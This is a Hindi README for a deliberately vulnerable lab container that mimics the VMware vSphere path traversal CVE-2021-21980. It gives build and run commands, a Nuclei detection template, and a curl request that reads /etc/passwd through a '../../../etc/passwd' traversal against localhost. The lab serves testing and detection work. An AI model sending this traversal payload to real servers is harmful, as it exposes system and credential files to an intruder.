
सीवीई-2021-21980 (VMware vSphere Path Traversal) के लिए यथार्थवादी असुरक्षित लैब - वास्तविक फ़ाइल शोषण, नकली सर्वर नहीं
यथार्थवादी परीक्षण वातावरण जो VMware vSphere Web Client पाथ ट्रैवर्सल भेद्यता का अनुकरण करता है।
⚠️ चेतावनी: भेद्य परीक्षण वातावरण। इसे इंटरनेट पर उजागर न करें!
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug
✅ वास्तव में फ़ाइलें पढ़ता है - Python फ़ाइल I/O का उपयोग करके कंटेनर फ़ाइल सिस्टम से
✅ यथार्थवादी व्यवहार - वास्तविक vSphere की तरह पाथ ट्रैवर्सल को संभालता है
✅ VMware हैडर - Server: VMware-HTTP-Server/1.0 शामिल करता है
✅ SSL/TLS - स्व-हस्ताक्षरित प्रमाणपत्र निर्माण
✅ हार्डकोडेड नहीं - वास्तविक फ़ाइल सामग्री लौटाता है
Dockerfile - कंटेनर निर्माण कॉन्फ़िगरेशनserver.py - भेद्य Flask एप्लिकेशनCVE-2021-21980.yaml - Nuclei डिटेक्शन टेम्पलेटREADME.md - यह फ़ाइलइस लैब को Nuclei से सत्यापित किया गया, जो दर्शाता है:
podman stop vcenter-lab && podman rm vcenter-lab